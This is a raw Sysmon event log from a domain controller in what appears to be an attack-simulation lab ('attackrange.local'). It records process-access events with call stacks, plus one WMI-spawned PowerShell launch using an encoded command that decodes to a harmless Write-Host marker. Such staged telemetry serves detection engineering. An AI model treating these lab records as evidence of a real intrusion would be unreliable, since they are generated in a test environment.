16:53:45.404{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D99-603E-ADAA-00000000AD01}5320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002239658Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.404{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239657Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.404{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239656Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.404{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239655Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.404{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239654Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.404{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6D99-603E-ADAA-00000000AD01}5320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002239653Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.388{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D99-603E-ADAA-00000000AD01}5320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002239652Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.404{05ADC7E1-6D99-603E-ADAA-00000000AD01}5320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /EncodedCommand VwByAGkAdABlAC0ASABvAHMAdAAgADIAMQA5ADgAMQA5AGMAOQAtAGIAMAAzADIALQA0ADIAYgAyAC0AOAA5ADQAZQAtAGYAMgA2ADcAMgAwADAAZQA5AGUAYQA3AA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002239651Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.388{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D99-603E-ABAA-00000000AD01}16164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239650Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.375{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6D99-603E-A9AA-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239649Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.375{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6D99-603E-A9AA-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239648Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D99-603E-ACAA-00000000AD01}4592C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239647Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D99-603E-ABAA-00000000AD01}16164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239646Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D99-603E-AAAA-00000000AD01}14736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239645Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D99-603E-A9AA-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239644Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D99-603E-A8AA-00000000AD01}13600C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239643Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D99-603E-A7AA-00000000AD01}11336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239642Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239641Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.374{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239640Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.373{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239639Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.373{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239638Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239637Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|